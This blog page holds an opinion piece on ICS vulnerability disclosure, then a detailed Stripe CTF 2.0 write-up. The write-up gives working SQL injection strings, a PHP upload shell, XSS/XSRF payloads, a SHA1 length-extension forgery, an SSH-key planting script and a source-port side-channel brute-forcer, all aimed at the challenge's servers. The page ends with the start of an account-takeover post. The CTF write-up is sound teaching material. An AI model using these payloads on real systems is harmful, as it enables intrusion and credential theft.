“Not disclosing an issue is not discussed; however it remains an option and may be appropriate in some scenarios.”

Very well. I’m a reasonable guy who’s even been known to support responsible disclosure, despite the fact that it puts handcuffs only on the good guys. Being such a reasonable guy, I’m going to pretend I can accept the idea that a company selling industrial systems or devices might have a genuine reason not to disclose a security flaw to its customers. In the spirit of such a debate, I invite any vendor to comment on this blog post with a hypothetical scenario in which this is justified.

Hypothetically speaking: When is it appropriate to withhold vulnerabilities and not disclose them to your ICS customers?

While we’re at it, we also see the age-old “disclosure always increases risk” trope again, here:

“Public Disclosure does increase risk to customers, as any information disclosed about the vulnerability is available to malicious individuals as well as to legitimate customers. If a vulnerability is disclosed publically prior to a fix being made available, or prior to an available fix being deployed to all customers, malicious parties may be able to use that information to impact customer operations.”

Since I was bold enough to challenge all vendors to answer my question about when it is appropriate to remain silent, it’s only fair to tackle a thorny issue from the document myself. Imagine you have a serious security flaw without a fix. The argument goes that you shouldn’t disclose it publicly since that would increase the risk. However, what if the exploit were tightly constrained and detectable in 100% of cases? It seems clear that in this case, public disclosure gives the best chance for your customers to DETECT exploitation as opposed to waiting for the fix. Wouldn’t that DECREASE risk? Unfortunately, until you can measure both risk and the occurrence of 0-day vulnerabilities in the wild RELIABLY, this is all just conjecture.

There exists a common misconception in vulnerability management that only the vendor can protect the customer by fixing an issue, and that public disclosure always increases risk. With public disclosure, you widen the circle of critical and innovative eyes, and a third party might be able to mitigate where the vendor cannot—for example, by using one of their own proprietary technologies.

Say, for example, that a couple of ICS vendors had partnered with an intrusion detection and prevention system company that is a known defender of industrial systems. They could then focus their early vulnerability analysis efforts on reliably detecting and mitigating exploits on the wire before the issues are even fixed. This would reduce the number of days after zero during which the exploit can’t be detected, and to my thinking, that reduces the risk. I’m disappointed that – in the post-Stuxnet era – we continue to have ICS disclosure debates, because the malware authors ultimately don’t even care. I can’t help but notice that recent ICS malware authors weren’t consulted about their “disclosure policies” and also didn’t choose to offer them.

As much as I love a lively debate, I wanted to commend the ICSJWG for having the patience to explain disclosure when the rest of us get tired.

INSIGHTS | August 29, 2012

Stripe CTF 2.0 Write-Up

Hello, World!

I had the opportunity to play and complete the 2012 Stripe CTF 2.0 this weekend. I would have to say this was one of the most enjoyable CTFs I’ve played by far. They did an excellent job. I wanted to share with you a detailed write-up of the levels, why they’re vulnerable, and how to exploit them. It’s interesting to see how different people take different routes on problems, so I’ve included some of the solutions by Michael Milvich (IOActive), Ryan O’Horo (IOActive), and Ryan Linn (SpiderLabs), as well as my own (Joseph Tartaro, IOActive).
I hope this write-up gives you the opportunity to learn something new or get a better understanding of how I approached this CTF. I’ve included all the main source code that was available on the information page of each level, even where it isn’t strictly necessary, so people can see it all if they’re interested. If you have any further questions, feel free to e-mail me at Joseph.Tartaro[at]ioactive[dot]com or make a comment below.
Let’s get started!
Level 0  –  SQL Injection
Level 1  –  Misuse of PHP Function on Untrusted Data
Level 2  –  File Upload Vulnerability
Level 3  –  SQL Injection
Level 4  –  XSS/XSRF
Level 5  –  Insecure Communication
Level 6  –  XSS/XSRF
Level 7  –  SHA1 Length-Extension Vulnerability
Level 8  –  Side Channel Attack
Source Code 

Level 0:

Welcome to Capture the Flag! If you find yourself stuck or want to learn more about web security in general, we’ve prepared a list of helpful resources for you. You can chat with fellow solvers in the CTF chatroom (also accessible in your favorite IRC client at irc://irc.stripe.com:+6697/ctf).
We’ll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes…
You can access the Secret Safe at https://level00-2.stripe-ctf.com/user-juwcldvclk. The Safe’s code is included below, and can also be obtained via git clone https://level00-2.stripe-ctf.com/user-juwcldvclk/level00-code.

So quickly looking at the code, the main areas we’re interested in are right here ….

*SNIP*

sqlite3 = require('sqlite3'); // SQLite (database) driver

*SNIP*

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
      if (err) throw err;
      renderPage(res, {namespace: namespace, secrets: secrets});
    });
  }

We can see that it queries the SQL database with our user-supplied input, and we know it is an sqlite3 database. Looking at the SQL statement, we see it uses the LIKE operator, which supports a wildcard character (%). When we supply the wildcard character as our namespace, the pattern matches every key, and the app responds with all the secrets in the database.
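
To see the wildcard trick outside the app, here’s a minimal sketch against an in-memory sqlite3 database (the rows are hypothetical):

import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE secrets (key TEXT, secret TEXT)")
db.executemany("INSERT INTO secrets VALUES (?, ?)",
               [("alice.pw", "hunter2"), ("bob.pw", "level01pass")])

# Legitimate use: the namespace "alice" matches only alice's keys.
print(db.execute("SELECT * FROM secrets WHERE key LIKE ? || '.%'",
                 ("alice",)).fetchall())

# Attack: supplying "%" as the namespace turns the pattern into "%.%",
# which matches every key in the table.
print(db.execute("SELECT * FROM secrets WHERE key LIKE ? || '.%'",
                 ("%",)).fetchall())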

Level 1:

Excellent, you are now on Level 1, the Guessing Game. All you have to do is guess the combination correctly, and you’ll be given the password to access Level 2! We’ve been assured that this level has no security vulnerabilities in it (and the machine running the Guessing Game has no outbound network connectivity, meaning you wouldn’t be able to extract the password anyway), so you’ll probably just have to try all the possible combinations. Or will you…?
You can play the Guessing Game at https://level01-2.stripe-ctf.com/user-jkcftciszp. The code for the Game can be obtained from git clone https://level01-2.stripe-ctf.com/user-jkcftciszp/level01-code, and is also included below.
So quickly looking at the code, here’s the block we’re interested in….
    <?php
      $filename = 'secret-combination.txt';
      extract($_GET);
      if (isset($attempt)) {
        $combination = trim(file_get_contents($filename));
        if ($attempt === $combination) {
          echo "<p>How did you know the secret combination was" .
               " $combination!?</p>";
          $next = file_get_contents('level02-password.txt');
          echo "<p>You've earned the password to the access Level 2:" .
               " $next</p>";
        } else {
          echo "<p>Incorrect! The secret combination is not $attempt</p>";
        }
      }
    ?>
So let’s step through the code and see what’s happening:
    • creates $filename storing ‘secret-combination.txt’
    • extract $_GET (all GET parameters supplied by the user)
    • if $attempt is set:
    • declare $combination with the trim()’d contents of $filename
    • if $attempt and $combination are equal
      • print contents of ‘level02-password.txt’
    • else
      • print incorrect
So let’s look at what extract() is actually doing…

int extract ( array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]] )
Import variables from an array into the current symbol table.
Checks each key to see whether it has a valid variable name. It also checks for collisions with existing variables in the symbol table.
If  extract_type  is not specified, it is assumed to be  EXTR_OVERWRITE.
Well, look at that: they didn’t specify an extract_type, so by default it is EXTR_OVERWRITE, which means, “If there is a collision, overwrite the existing variable.”
There was even a nice little warning for us,
Do not use extract() on untrusted data, like user input (i.e., $_GET, $_FILES, etc.).
So now looking back at the code, we can see that they declare $filename before they use extract(), so this gives us the opportunity to create a collision and overwrite the existing variable with our GET parameters.

In simple terms, it will create variables depending on what you supply in your GET request. In this case we can see that our request /?attempt=SECRET creates a variable $attempt that stores the value "SECRET", so we could also send /?attempt=SECRET&filename=random_file.txt. The extract() will now overwrite their original $filename with our supplied value, "random_file.txt".

So what can we do to make these match? You see how $combination stores the result of file_get_contents() on $filename, then trim()s it. If file_get_contents() returns false because the file doesn’t exist, trim(false) returns an empty string. So if we supply a filename that does not exist and an empty $attempt, both sides are empty strings and they match…
So let’s supply:
/?attempt=&filename=file_that_does_not_exist.txt

Level 2:

You are now on Level 2, the Social Network. Excellent work so far! Social Networks are all the rage these days, so we decided to build one for CTF. Please fill out your profile at https://level02-2.stripe-ctf.com/user-alucnmpgjr. You may even be able to find the password for Level 3 by doing so.
The code for the Social Network can be obtained from git clone https://level02-2.stripe-ctf.com/user-alucnmpgjr/level02-code, and is also included below.
So, this one is pretty simple. The areas we’re interested in are:
*snip*

$dest_dir = "uploads/";

*snip*

<form action="" method="post" enctype="multipart/form-data">
   <input type="file" name="dispic" size="40" />
   <input type="submit" value="Upload!">
</form>
 
<p>
   Password for Level 3 (accessible only to members of the club):
   <a href="password.txt">password.txt</a>

 
*snip*
Looking at this, we have an ‘uploads’ directory that we can access and a form we can use to upload images. There are no checks on file extensions at all, so let’s try uploading a file that is not an image – a PHP script.
<?php
$output = shell_exec('cat ../password.txt');
echo "<pre>$output</pre>";
?>
Then just browse to the /uploads/ dir and click on your uploaded php file.
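
If you’d rather script the upload, here’s a hedged sketch using the third-party requests library; the dispic field name comes from the form above, while the exact URL path and the session cookie value are assumptions you’d fill in from your own browser session:

import requests

base = "https://level02-2.stripe-ctf.com/user-alucnmpgjr/"
cookies = {"session": "<your-session-cookie>"}  # hypothetical value

# upload the PHP shell through the profile-picture form field...
with open("shell.php", "rb") as f:
    requests.post(base, files={"dispic": ("shell.php", f)}, cookies=cookies)

# ...then fetch it from /uploads/ so the server executes it
print(requests.get(base + "uploads/shell.php", cookies=cookies).text)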

Level 3:

After the fiasco back in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution (kind of like Unbreakable Linux). The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.
A beta version has launched with some interesting secrets (including the password to access Level 4); you can check it out at https://level03-2.stripe-ctf.com/user-cmzqxoblip. As usual, you can fetch the code for the level (and some sample data) via git clone https://level03-2.stripe-ctf.com/user-cmzqxoblip/level03-code, or you can read the code below.

OK, so let’s look at some important parts. We know it’s sqlite3 again, and we can see how the database is set up:

# CREATE TABLE users (
#   id VARCHAR(255) PRIMARY KEY AUTOINCREMENT,
#   username VARCHAR(255),
#   password_hash VARCHAR(255),
#   salt VARCHAR(255)
# );
And
    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

    res = cursor.fetchone()
    if not res:
        return "There's no such user {0}!\n".format(username)
    user_id, password_hash, salt = res

    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

So we can see that the statement uses our supplied username, which is of course SQL-injectable. It selects the id, password_hash, and salt from users where the username equals our input. Let’s load up our own sample database, make some test queries, and see what happens…

sqlite> insert into users values ("myid", "myusername", "0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60", "SUPER_SECRET_SALT");
sqlite> select id, password_hash, salt FROM users where username = 'myusername';
myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
So, let's do a union select after and supply exactly what we would like back.
sqlite> select id, password_hash, salt FROM users where username = 'myusername' union select 'new id', 'new hash', 'new salt';
myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
new id|new hash|new salt

As you can see, by using a union select we can define the content of the response: ‘new id’, ‘new hash’, and ‘new salt’ came back in our response. Looking at the code, when it does the comparison it computes sha256(password + salt) and compares it to the password_hash returned by the SQL statement.

Let's supply our own hash and compare them to each other!
>>> import hashlib
>>> print hashlib.sha256("lolpassword" + "lolsalt").hexdigest()
dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5
>>>
We just created our new sha256 hash with the salt ‘lolsalt’; let’s now submit our new hash injection into the SQL statement.

username: z'%20union%20select%20'1','dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5','lolsalt

password:
lolpassword

The code will now take the password you submitted, hash it with the salt returned by the SQL query, and compare the result to the hash in that same response (the salt and hash in the response are the ones we supplied in our injection). They match, and you receive a message similar to this:
Welcome back! Your secret is: “The password to access level04 is: aZnRbEpSfX” (Log out)

Level 4:

The Karma Trader is the world’s best way to reward people for good deeds: https://level04-2.stripe-ctf.com/user-xjqcwqqyvp. You can sign up for an account, and start transferring karma to people who you think are doing good in the world. In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.
The very active user karma_fountain has infinite karma, making it a ripe account to obtain (no one will notice a few extra karma trades here and there). The password for karma_fountain‘s account will give you access to Level 5.
You can obtain the full, runnable source for the Karma Trader from git clone https://level04-2.stripe-ctf.com/user-xjqcwqqyvp/level04-code. We’ve included the most important files below.
This is a nice little XSS/XSRF challenge. The goal here is to get that karma_fountain to send you some karma, which in turn will let you view their password.
 When registering a new account, you can insert malicious code into the password field; it will be rendered in a recipient’s browser when you send them karma, because the application is designed to show users your password once they receive karma from you.
In this situation they’re including jQuery, which makes our lives even easier when crafting requests. The idea is to inject into karma_fountain’s page some malicious code that will automatically make the account transfer you some karma.
I went and created a new user named ‘whoop’ with the password:
'<script>$.post("transfer", { to: "whoop", amount: "2" } );</script>'
Now log in, send some karma to karma_fountain, and wait… eventually the karma_fountain user will view their page, and your injected code will force them to transfer karma to the user ‘whoop’.
Refresh your page until you can view karma fountain’s password on the right.

Level 5:

Many attempts have been made at creating a federated identity system for the web (see OpenID, for example). However, none of them have been successful. Until today.
The DomainAuthenticator is based on a novel protocol for establishing identities. To authenticate to a site, you simply provide it a username, a password, and a pingback URL. The site posts your credentials to the pingback URL, which returns either “AUTHENTICATED” or “DENIED”. If “AUTHENTICATED”, the site considers you signed in as a user for the pingback domain.
You can check out the Stripe CTF DomainAuthenticator instance here: https://level05-1.stripe-ctf.com/user-qoqflihezv. We’ve been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine…
To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. Though, you’ve heard that someone forgot to internally firewall off the high ports from the Level 2 server.
Interested in setting up your own DomainAuthenticator? You can grab the source from git clone https://level05-1.stripe-ctf.com/user-qoqflihezv/level05-code, or by reading on below.
So, this problem is just… insecure communication in general. There are a couple of issues here.
This code block checks that the request was a POST, but it doesn’t check whether the supplied parameters arrived on the GET query string or in the POST body:
    post '/*' do
      pingback = params[:pingback]
      username = params[:username]
      password = params[:password]
This is an insecure way of checking if we’re Authenticated…
    def authenticated?(body)
      body =~ /[^\w]AUTHENTICATED[^\w]*$/
There are multiple ways of clearing this level… but Ryan O’Horo showed me his route, which was the cleanest of the four we tried. The whole idea is to get the response to match the AUTHENTICATED regex, but on a host of level05-*.stripe-ctf.com.
So…the easiest route….
POST /user-smrqjnvcis/?username=root&pingback=https://level05-1.stripe-ctf.com/user-smrqjnvcis/%3fpingback=http://level05-2.stripe-ctf.com/AUTHENTICATED%250A HTTP/1.1
The pingback URL contains a newline (%0A) so that the regular expression’s end-of-line marker matches right after the word “AUTHENTICATED”; it must be double-encoded (%250A) because it’s nested inside the original pingback parameter.
This makes the application ping back to the level05 host, but since we specified http:// instead of https://, that server answered with a 302 redirect to the URL https://level05-2.stripe-ctf.com/AUTHENTICATED%250A, which the application matched against the regex in the response, authenticating the user.
I won’t bother showing the other routes some of us took… simply because I’m embarrassed at how much harder we made it on ourselves compared to Ryan’s one-request solution.

Level 6:

After Karma Trader from Level 4 was hit with massive karma inflation (purportedly due to someone flooding the market with massive quantities of karma), the site had to close its doors. All hope was not lost, however, since the technology was acquired by a real up-and-comer, Streamer. Streamer is the self-proclaimed most streamlined way of sharing updates with your friends. You can access your Streamer instance here: https://level06-2.stripe-ctf.com/user-bqdgqqeqqd
The Streamer engineers, realizing that security holes had led to the demise of Karma Trader, have greatly beefed up the security of their application. Which is really too bad, because you’ve learned that the holder of the password to access Level 7, level07-password-holder, is the first Streamer user.
As well, level07-password-holder is taking a lot of precautions: his or her computer has no network access besides the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.
Fortunately for you, the Streamer engineers have decided to open-source their application so that other people can run their own Streamer instances. You can obtain the source for Streamer at git clone https://level06-2.stripe-ctf.com/user-bqdgqqeqqd/level06-code. We’ve also included the most important files below.
 
OK, so in this level we’re dealing with a unique social network. We have to find a way to view another user’s user_info page to see their password. If you start writing some posts of your own, you’ll find the site is susceptible to cross-site scripting. So we need a way to make the victim view their own user_info page and then post the results somewhere we can view them.
We are limited in that we can’t use the single-quote and double-quote characters (' and "), but everything else is pretty much legal, so we can make use of JavaScript’s String.fromCharCode() and, once again, jQuery! We’ll have to break out of their script tags and then inject our code, while making sure the code doesn’t launch until the entire page has loaded. They have a CSRF token, but it’s poorly implemented, seeing that we can reuse the JavaScript code that’s already on the page. Another issue you’ll run into is that the results from the user_info page contain characters that are not allowed, so we escape() the data response before posting it. Here’s the payload I used, before String.fromCharCode:
</script><script>$(document).ready(function() {$.get('user_info', function(data) {document.forms[0].body.value = escape(data); document.forms[0].submit();})});</script><script>//
And here it is after….
</script><script>$(document).ready(function() {eval(String.fromCharCode(36,46,103,101,116,40,39,117,115,101,114,95,105,110,102,111,39,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,32,123,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,98,111,100,121,46,118,97,108,117,101,32,61,32,101,115,99,97,112,101,40,100,97,116,97,41,59,32,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,115,117,98,109,105,116,40,41,59,125,41))});</script><script>//
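
If you’d rather not build that argument list by hand, a small Python helper (mine, not part of the level) generates the character codes from the inner JavaScript:

# Prints the String.fromCharCode argument list for the payload above.
js = ("$.get('user_info', function(data) {document.forms[0].body.value = "
      "escape(data); document.forms[0].submit();})")
print(",".join(str(ord(c)) for c in js))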
We can now wait and watch posts being created – keep an eye on /ajax/posts so that your XSS won’t also hit you. You’ll soon see a new post by the Level 7 user consisting of a huge block of URL-encoded characters. Go ahead and decode them and you’ll see something like…

Level 7:

 
Welcome to the penultimate level, Level 7.
WaffleCopter is a new service delivering locally-sourced organic waffles hot off of vintage waffle irons straight to your location using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested in private beta in select locations.
Your goal is to order one of the decadent Liège Waffles, offered only to WaffleCopter’s first premium subscribers.
Log in to your account at https://level07-2.stripe-ctf.com/user-dsccixwxvo with username ctf and password password. You will find your API credentials after logging in. You can fetch the code for the level via
git clone https://level07-2.stripe-ctf.com/user-dsccixwxvo/level07-code, or you can read it below. You may find the sample API client in client.py particularly helpful.
This level is a slight twist: you’ll actually be attacking their crypto. Looking at the code, you’ll see they use SHA1 signatures computed over your secret plus the raw request you made, and we need to place an order as a premium user. When you order a waffle you receive a confirmation number; order the premium waffle, and that confirmation number is your password to Level 8.
Here is the block of code that verifies the signature… this is how we know how the signature is built and that it is SHA1:
def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

    h = hashlib.sha1()
    h.update(secret + raw_params)
    print 'computed signature', h.hexdigest(), 'for body', repr(raw_params)
    if h.hexdigest() != sig:
        raise BadSignature('signature does not match')
    return True

Researching SHA1, we find it is vulnerable to a length-extension attack, a type of attack on certain hashes that allows extra data to be appended to a signed message without knowing the secret. There’s excellent documentation describing this attack in the Flickr API Signature Forgery Vulnerability write-up, and there’s also a nice script and write-up at vnsecurity by RD about how he solved a similar CodeGate 2010 challenge. For my solution I used the script supplied on vnsecurity. Since we know what the raw request will be, and we know the length of the secret (14), we can append data to the raw request and generate a valid hash. Looking at the /logs/ directory, we can also view other users’ requests… in this case we’re interested in premium users, so user_id 1 or 2.
This is a request that was made by user_id 1:
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:a75edb45bc6c0057e059b23bc48b84f7081a798f
As you can see, we have the raw request and the final hash… let’s append to this and generate a new valid hash, but ordering  a different waffle.
droogie$ python sha-padding.py '14' 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo' 'a75edb45bc6c0057e059b23bc48b84f7081a798f' '&waffle=liege'
new msg: 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege'
base64: Y291bnQ9MTAmbGF0PTM3LjM1MSZ1c2VyX2lkPTEmbG9uZz0tMTE5LjgyNyZ3YWZmbGU9ZWdnb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIoJndhZmZsZT1saWVnZQ==
new sig: 4c230b26a20f192c4a258f529662d3dd0ad8b62d
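
If you’re wondering where all of those \x00 bytes come from, they’re just SHA-1’s own message padding for a 69-byte input (14-byte secret + 55-byte request); here’s a minimal sketch of that computation (mine, not part of the vnsecurity script):

import struct

def sha1_pad(total_len):
    # SHA-1 appends 0x80, zero bytes until length % 64 == 56,
    # then the message length in bits as a 64-bit big-endian integer.
    pad = b"\x80"
    pad += b"\x00" * ((56 - (total_len + 1) % 64) % 64)
    pad += struct.pack(">Q", total_len * 8)
    return pad

secret_len = 14  # known from the level
orig = b"count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo"
forged = orig + sha1_pad(secret_len + len(orig)) + b"&waffle=liege"
print(repr(forged))  # matches the "new msg" produced above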
And here we are… the script has supplied the correct amount of padding and given us the raw request and a valid hash. Let’s go ahead and make the request using a simple Python script…
droogie$ cat post.py
import urllib
import urllib2
url = 'https://level07-2.stripe-ctf.com/user-dsccixwxvo/orders'
data = 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege|sig:4c230b26a20f192c4a258f529662d3dd0ad8b62d'
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print response.read()
droogie$ python post.py
{"confirm_code": "BdxavaMIKC", "message": "Great news: 10 liege waffles will soon be flying your way!", "success": true}

Level 8:

Welcome to the final level, Level 8.
HINT 1: No, really, we’re not looking for a timing attack.
HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output?
UPDATE: If you push the reset button for Level 8, you will be moved to a different Level 8 machine, and the value of your Flag will change. If you push the reset button on Level 2, you will be bounced to a new Level 2 machine, but the value of your Flag won’t change.
Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You’ve recently learned that the Flag itself is protected in a PasswordDB instance, accessible at https://level08-1.stripe-ctf.com/user-eojzgklshq/.
PasswordDB exposes a simple JSON API. You just POST a payload of the form {"password": "password-to-check", "webhooks": ["mysite.com:3000", ...]} to PasswordDB, which will respond with a {"success": true} or {"success": false} to you and your specified webhook endpoints.
(For example, try running curl https://level08-1.stripe-ctf.com/user-eojzgklshq/ -d '{"password": "password-to-check", "webhooks": []}'.)
In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers’ respective existences. Instead, the password is “chunked” across multiple processes, called “chunk servers”. These may live on the same machine as the HTTP-accepting “primary server”, or for added security may live on a different machine. PasswordDB comes with built-in security features such as timing attack prevention and protection against using inequitable amounts of CPU time (relative to other PasswordDB instances on the same machine).
As a secure cherry on top, the machine hosting the primary server has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. As you learned in Level 5, someone forgot to internally firewall off the high ports from the Level 2 server. (It’s almost like someone on the inside is helping you — there’s an sshd running on the Level 2 server as well.)
To maximize adoption, usability is also a goal of PasswordDB. Hence a launcher script, password_db_launcher, has been created for the express purpose of securing the Flag. It validates that your password looks like a valid Flag and automatically spins up 4 chunk servers and a primary server.
You can obtain the code for PasswordDB from git clone https://level08-1.stripe-ctf.com/user-eojzgklshq/level08-code, or simply read the source below.

This level seems a little involved, but it’s easy to understand once you see what it’s doing. There is a primary server; when you launch it, you supply a 12-digit password and a socket to listen on. It breaks the password into 4 chunks of 3 characters each and spawns 4 chunk servers, each holding one chunk, against which all requests are compared. The primary server then receives requests containing a candidate password: it chunks up the supplied password and checks with the chunk servers. If it receives TRUE from all 4 it responds with TRUE; FALSE from any of them and you get FALSE. Your goal is to figure out the 12-digit password that was supplied to the primary server on startup. When making a request to the primary server you can also supply a webhook, and the server will send the response to whatever socket you specify.
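
For clarity, the chunking scheme looks like this (hypothetical password):

password = "123456789012"
chunks = [password[i:i+3] for i in range(0, 12, 3)]  # one chunk per chunk server
print(chunks)  # ['123', '456', '789', '012']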

There’s a major issue here with their design….
If we bruteforce the 12 digit password, we would be looking at this many attempts:
>>> 10**12
1000000000000
If we bruteforce the chunks, we’re looking at a total of this many:
>>> 10**3*4
4000
That’s a maximum of only 1,000 attempts per chunk. They’ve significantly lowered their security if there is any way to tell whether an individual chunk was correct – and of course there is 😉
Since the network is so locked down, we can’t actually touch the chunk servers themselves… if we could, we would just bruteforce each chunk and this challenge would be very simple… so we have to find another way to bruteforce each chunk. We also can’t try a timing attack because the developers have implemented some delays on responses to avoid this.
Well, one thing we can do is get onto the local network so we can receive responses from Level 8, using Level 2 as the description suggested.
Let’s go ahead and create a local ssh key we can use, then upload it to the Level2 server using that file upload vulnerability.
<?php
mkdir("../../.ssh");
$h = fopen("../../.ssh/authorized_keys", "w+");
fwrite($h, "ssh-rsa (MYSECRETLOCALSSHKEY)\n\n");
fclose($h);
print "DONE!\n";
?>
Cool, now we can ssh into this box:
Linux leveltwo3.ctf-1.stripe-ctf.com 2.6.32-347-ec2 #52-Ubuntu SMP Fri Jul 27 14:38:36 UTC 2012 x86_64 GNU/Linux
Ubuntu 10.04.4 LTS
Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/
Last login: Mon Aug 27 03:45:20 2012 from cpe-174-097-161-152.nc.res.rr.com
groups: cannot find name for group ID 4334
user-wsotctjptv@leveltwo3:~$
At this point we can create sockets and receive responses from the primary server through our webhook parameter, and we can use this as a side channel to tell whether our requests were true or false. We do it by keeping track of the connections to our socket and their source ports. By default, most operating systems are lazy and will use the last source port + 1 for the next outbound connection. So on an invalid request, the difference between the source ports we observe is 2: one connection to chunk server 1, then one back to us with the response. But if our first chunk happens to be correct, the primary makes a request to chunk server 1, then chunk server 2, then us – so if we repeat an attempt multiple times and consistently see a difference of 3 in the source ports, we know the chunk was valid. We can repeat this process to verify the first three chunks, then just brute-force the last chunk directly. Here’s a Python script written by my co-worker Michael that does just that…

#!/usr/bin/env python

import socket
import urllib2
import json
import sys

try:
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("--port", default=49567, type=int, help="Which port to listen for incoming connections on")
    parser.add_argument("targetURL", help="The URL of the targeted primary server")
    parser.add_argument("webhooksHost", help="Where the primary server should connect back for the webhooks")
    args = parser.parse_args()
except ImportError:
    # level02 server doesn't have argparse... grrr
    class args(object):
        port = 49567
        targetURL = sys.argv[1]
        webhooksHost = sys.argv[2]

def password_gen(length, prefix="", charset="1234567890"):
    # yields every candidate password of the given length that starts with prefix
    def gen(length, charset):
        if length == 0:
            yield ""
        else:
            for ch in charset:
                for pw in gen(length - 1, charset):
                    yield pw + ch

    for pw in gen(length - len(prefix), charset):
        yield prefix + pw

def do_webhooks_connectback():
    # accept the primary server's webhook connection and return its source port
    c_sock, addr = webhook_sock.accept()
    c_sock.recv(1000)
    c_sock.send("HTTP/1.0 200\r\n\r\n")
    c_sock.close()
    return addr[1]

def do_auth_request(password):
    print "Trying password:", password
    r = urllib2.urlopen(args.targetURL, json.dumps({"password": password, "webhooks": webhook_hosts}))
    port = do_webhooks_connectback()
    result = json.loads(r.read())

    print "Connect back Port:", port

    if result["success"]:
        print "Found the password!!!"
        print result
        sys.exit(0)
    else:
        return port

def calc_chunk_servers_for_password(password):
    # we need to figure out what the "current" port is, so make a request that will fail
    base_port = do_auth_request("aaa")
    # figure out what the last port number is
    final_port = do_auth_request(password)
    # now we can tell how many chunk servers it talked to in between
    return (final_port - base_port) - 1

# create the listen socket
webhook_sock = socket.socket()
webhook_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
webhook_sock.bind(("", args.port))
webhook_sock.listen(100)

webhook_hosts = ["%s:%d" % (args.webhooksHost, args.port)]

# We can guess our password by counting how many TCP connections the primary server
# has made before connecting back to our webhook. The more connections the server
# has made, the more chunks we have correct.

prefix = ""
curr_chunk = 1

while True:
    for pw in password_gen(12, prefix):
        found_chunk = True
        for i in xrange(10):
            num_servers = calc_chunk_servers_for_password(pw)
            print "Num Servers:", num_servers
            if num_servers == curr_chunk:
                # incorrect password
                found_chunk = False
                break
            elif num_servers > curr_chunk:
                # we may have figured out a chunk... but someone else may have just
                # made a request, so we will just try again
                continue
            elif num_servers < 0:
                # ran out of ports and we restarted the port range
                continue
            else:
                # somehow we regressed... abort!
                print "[!!!!] Hmmm... somehow we ended up talking to fewer servers than before..."
                sys.exit(-1)
        if found_chunk:
            # ok, we are fairly confident that we have found the next password chunk
            prefix = pw[:curr_chunk * 3]  # assuming 4 chunk servers, with 3 chars each... TODO: should calc this
            curr_chunk += 1
            print "[!] Found chunk:", prefix
            break
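
For reference, a hypothetical invocation (the script name, URL, and hostname below are placeholders, not values from the actual level) would look something like this:

   python level02_bruteforce.py --port 49567 http://level02.example.com/ our-public-host.example.com

Note that each candidate chunk is measured up to ten times: other players' requests can also advance the server's ephemeral port counter, so a chunk is only accepted when none of the measurements shows the incorrect-password delta.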

INSIGHTS | August 17, 2012

One Mail to Rule Them All

This small research project was conducted over a four-week period a while back; password restoration procedures change over time, so current methods may differ.

While I was writing this blog post, the Gizmodo writer Mat Honan's account was hacked through some clever social engineering that ultimately brought numerous small bits and pieces of information together into one big chunk of usable data. Part of the problem is that different services use different fallback methods to reset passwords: some have you enter the last four digits of your credit card, while others want your mother's maiden name. The attacks described here differ a bit, but the implications are just as devastating.
